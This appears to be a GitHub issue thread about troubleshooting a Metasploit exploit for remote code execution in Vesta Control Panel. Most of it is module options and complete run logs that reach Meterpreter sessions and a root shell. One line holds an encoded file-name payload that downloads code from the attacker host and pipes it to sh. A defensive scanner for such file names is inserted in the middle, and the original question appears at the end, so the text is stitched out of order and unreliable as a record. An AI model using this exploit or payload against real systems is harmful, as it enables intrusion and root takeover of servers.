Closed margo-gru closed 4 years ago
Everything is working as expected for me with msf5.
msf5 exploit(linux/http/vestacp_exec) > version
Framework: 5.0.89-dev-6034f48e8f
Console : 5.0.89-dev-6034f48e8f
msf5 exploit(linux/http/vestacp_exec) > options
Module options (exploit/linux/http/vestacp_exec):
Name Current Setting Required Description
---- --------------- -------- -----------
PASSWORD mehmet yes The password to login with
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS 192.168.74.218 yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT 8083 yes The target port (TCP)
SRVHOST 192.168.74.1 yes The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
SRVPORT 8081 yes The local port to listen on.
SSL true no Negotiate SSL/TLS for outgoing connections
SSLCert no Path to a custom SSL certificate (default is randomly generated)
TARGETURI / yes The URI of the vulnerable instance
URIPATH no The URI to use for this exploit (default is random)
USERNAME mehmet yes The username to login as
VHOST no HTTP server virtual host
Payload options (python/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST 192.168.74.1 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Automatic
msf5 exploit(linux/http/vestacp_exec) >
msf5 exploit(linux/http/vestacp_exec) > run
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.
[*] Started reverse TCP handler on 192.168.74.1:4444
msf5 exploit(linux/http/vestacp_exec) > [*] 192.168.74.218:8083 - Using URL: http://192.168.74.1:8081/XOYCxA6tqHEoR
[*] 192.168.74.218:8083 - Second payload download URI is http://192.168.74.1:8081/XOYCxA6tqHEoR
[+] 192.168.74.218:21 - Successfully authenticated to the FTP service
[+] 192.168.74.218:21 - The file with the payload in the file name has been successfully uploaded.
[*] 192.168.74.218:8083 - Retrieving cookie and csrf token values
[+] 192.168.74.218:8083 - Cookie and CSRF token values successfully retrieved
[*] 192.168.74.218:8083 - Authenticating to HTTP Service with given credentials
[*] 192.168.74.218:8083 - Starting scheduled backup. Exploitation may take up to 5 minutes.
[+] 192.168.74.218:8083 - Scheduled backup has been started !
[*] 192.168.74.218:8083 - It seems there is an active backup process ! Recheck after 30
[*] 192.168.74.218:8083 - It seems there is an active backup process ! Recheck after 30 second. Zzzzzz...
[*] 192.168.74.218:8083 - It seems there is an active backup process ! Recheck after 30 second. Zzzzzz...
[*] 192.168.74.218:8083 - It seems there is an active backup process ! Recheck after 30 second. Zzzzzz...
[+] 192.168.74.218:8083 - First stage is executed ! Sending 2nd stage of the payload
[*] Sending stage (53755 bytes) to 192.168.74.218
[*] Meterpreter session 1 opened (192.168.74.1:4444 -> 192.168.74.218:34876) at 2020-05-14 16:55:32 +0300
msf5 exploit(linux/http/vestacp_exec) > sessions -i 1
[*] Starting interaction with 1...
meterpreter > id
I am not sure these types of new modules are compatible with the msf4 version that you are using.
Indeed, we did change a lot in the framework between MSF4 and MSF5. MSF4 is no longer supported and has not received any updates since around January/February of this year when we ceased development on it after having supported both MSF4 and MSF5 for several months. If you are still receiving the error on MSF5, then I'll be happy to look into this further, but for the moment this sounds like it could be a case of just using an outdated version of the Framework as @mmetince mentioned.
@gwillcox-r7 @mmetince, thank you. Okay, I'll update the Metasploit framework and will see if it is working.
Thank you @mmetince @gwillcox-r7. IT WORKED! After updating to MSF5, the exploit worked as expected.
Module options (exploit/linux/http/vestacp_exec):
Name Current Setting Required Description
---- --------------- -------- -----------
PASSWORD KyoqTdqsak yes The password to login with
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS 10.115.119.174 yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT 8083 yes The target port (TCP)
SRVHOST 10.113.199.116 yes The local host to listen on. This must be an address on the local machine or 0.0.0.0
SRVPORT 8080 yes The local port to listen on.
SSL true no Negotiate SSL/TLS for outgoing connections
SSLCert no Path to a custom SSL certificate (default is randomly generated)
TARGETURI / yes The URI of the vulnerable instance
URIPATH no The URI to use for this exploit (default is random)
USERNAME admin yes The username to login as
VHOST no HTTP server virtual host
Payload options (python/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST 10.113.199.116 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Automatic
msf5 exploit(linux/http/vestacp_exec) > run
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.
[*] Started reverse TCP handler on 10.113.199.116:4444
[*] 10.115.119.174:8083 - Using URL: http://10.113.199.116:8080/dDpSWt7nA
[*] 10.115.119.174:8083 - Second payload download URI is http://10.113.199.116:8080/dDpSWt7nA
msf5 exploit(linux/http/vestacp_exec) > [+] 10.115.119.174:21 - Successfully authenticated to the FTP service
[+] 10.115.119.174:21 - The file with the payload in the file name has been successfully uploaded.
[*] 10.115.119.174:8083 - Retrieving cookie and csrf token values
[+] 10.115.119.174:8083 - Cookie and CSRF token values successfully retrieved
[*] 10.115.119.174:8083 - Authenticating to HTTP Service with given credentials
[*] 10.115.119.174:8083 - Starting scheduled backup. Exploitation may take up to 5 minutes.
[+] 10.115.119.174:8083 - Scheduled backup has been started !
[*] 10.115.119.174:8083 - It seems there is an active backup process ! Recheck after 30 second. Zzzzzz...
[*] 10.115.119.174:8083 - It seems there is an active backup process ! Recheck after 30 second. Zzzzzz...
[*] 10.115.119.174:8083 - It seems there is an active backup process ! Recheck after 30 second. Zzzzzz...
[*] 10.115.119.174:8083 - It seems there is an active backup process ! Recheck after 30 second. Zzzzzz...
[*] 10.115.119.174:8083 - It seems there is an active backup process ! Recheck after 30 second. Zzzzzz...
[*] 10.115.119.174:8083 - It seems there is an active backup process ! Recheck after 30 second. Zzzzzz...
[*] 10.115.119.174:8083 - It seems there is an active backup process ! Recheck after 30 second. Zzzzzz...
[*] 10.115.119.174:8083 - It seems there is an active backup process ! Recheck after 30 second. Zzzzzz...
[*] 10.115.119.174:8083 - It seems there is an active backup process ! Recheck after 30 second. Zzzzzz...
[*] 10.115.119.174:8083 - It seems there is an active backup process ! Recheck after 30 second. Zzzzzz...
[+] 10.115.119.174:8083 - First stage is executed ! Sending 2nd stage of the payload
[*] Sending stage (53755 bytes) to 10.115.119.174
[*] Meterpreter session 1 opened (10.113.199.116:4444 -> 10.115.119.174:42070) at 2020-05-14 20:24:56 -0700
[+] 10.115.119.174:8083 - Deleted /home/admin/.a';$(perl${IFS}-e${IFS}'system(pack(qq,H102,,qq,6375726c202d73534c20687474703a2f2f31302e3131332e3139392e3131363a383038302f644470535774376e41207c207368,))');'
[+] 10.115.119.174:8083 - Deleted /usr/local/vesta/data/users/admin/backup.conf
[+] 10.115.119.174:8083 - Payload appears to have executed in the background. Enjoy the shells <3
msf5 exploit(linux/http/vestacp_exec) > sessions -i 1
[*] Starting interaction with 1...
meterpreter > shell
Process 15126 created.
Channel 1 created.
sh: no job control in this shell
sh-4.2# id
uid=0(root) gid=0(root) groups=0(root) context=system_u:system_r:initrc_t:s0
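Both run logs above show the first stage arriving as a file name in the panel user's home directory ("The file with the payload in the file name has been successfully uploaded") and executing once the scheduled backup runs. A defender-side check for such names, added here as an example that is not part of the thread or of the Metasploit module; the rule labels, function names and sample names are this example's own assumptions:

```python
import os
import re

# Shell constructs that have no business in a hosted user's file names.
# Rule labels are this example's own, not from VestaCP or Metasploit.
RULES = [
    ("command-substitution", re.compile(r"\$\(|`")),
    ("ifs-expansion", re.compile(r"\$\{?IFS\}?")),
    ("quote-then-separator", re.compile(r"['\"]\s*[;&|]")),
    ("control-character", re.compile(r"[\x00-\x1f\x7f]")),
]


def suspicious_reasons(name):
    """Return the labels of every rule that matches one file name."""
    return [label for label, rx in RULES if rx.search(name)]


def scan_names(names):
    """Map each flagged name to its reasons; clean names are omitted."""
    return {n: r for n in names if (r := suspicious_reasons(n))}


def scan_tree(root):
    """Walk root (e.g. /home) and return {path: reasons} for flagged entries."""
    hits = {}
    for dirpath, dirnames, filenames in os.walk(root):
        for name in dirnames + filenames:
            reasons = suspicious_reasons(name)
            if reasons:
                hits[os.path.join(dirpath, name)] = reasons
    return hits


# Constructed sample names (not taken from a real system).
SAMPLE = [
    "index.html",
    "Q3 report (final).pdf",
    "it's-done.txt",
    ".a';$(echo${IFS}test);'",
]

if __name__ == "__main__":
    for path, why in scan_names(SAMPLE).items():
        print(f"{path!r}: {', '.join(why)}")
```

Running `scan_tree` over the FTP-writable home directories before the backup job fires, or alerting on matching names in FTP upload logs, catches the staging step that both logs show preceding the session.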
I'm trying to exploit https://github.com/rapid7/metasploit-framework/pull/13094#issue-390484331. The exploit is for Vesta Control Panel Remote Code Execution 0day, but I'm getting an error while exploiting. Current configuration is Error is
Using Kali Linux, Metasploit version: Framework: 4.17.24-dev Console : 4.17.24-dev
Can you please help me with the error?